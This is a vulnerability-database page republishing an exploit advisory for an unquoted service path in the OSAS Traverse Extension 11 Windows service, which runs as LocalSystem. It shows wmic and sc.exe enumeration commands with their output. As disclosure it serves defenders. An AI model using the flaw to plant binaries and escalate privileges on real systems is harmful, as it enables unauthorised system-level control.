Lucene search
K

OSAS Traverse Extension 11 Unquoted Service Path

🗓️ 22 Mar 2021 00:00:00Reported by Tech JohnnyType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 260 Views

OSAS Traverse Extension 11 Unquoted Service Path on Windows 2012R

Code
`# Exploit Title: OSAS Traverse Extension 11 - 'travextensionhostsvc' Unquoted Service Path  
# Exploit Auth: Tech Johnny  
# Vendor Homepage: https://www.osas.com  
# Version: 11 x86  
# Tested on: Windows 2012R2  
  
Details:  
  
C:\Windows\system32>wmic service get name, pathname, displayname,  
startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr  
/i /v """  
  
TRAVERSE Automation Service TravExtensionHostSvc C:\Program Files\Open  
Systems, Inc\TRAVERSE\TRAVERSE.Host.CustomExtensions.exe Auto  
  
C:\Windows\system32>sc.exe qc travextensionhostsvc  
[SC] QueryServiceConfig SUCCESS  
SERVICE_NAME: travextensionhostsvc  
TYPE : 10 WIN32_OWN_PROCESS  
START_TYPE : 2 AUTO_START (DELAYED)  
ERROR_CONTROL : 1 NORMAL  
BINARY_PATH_NAME : C:\Program Files\Open Systems,Inc\TRAVERSE\TRAVERSE.Host.CustomExtensions.exe  
LOAD_ORDER_GROUP : TAG : 0  
DISPLAY_NAME : TRAVERSE Automation Service  
DEPENDENCIES :  
SERVICE_START_NAME : LocalSystem  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation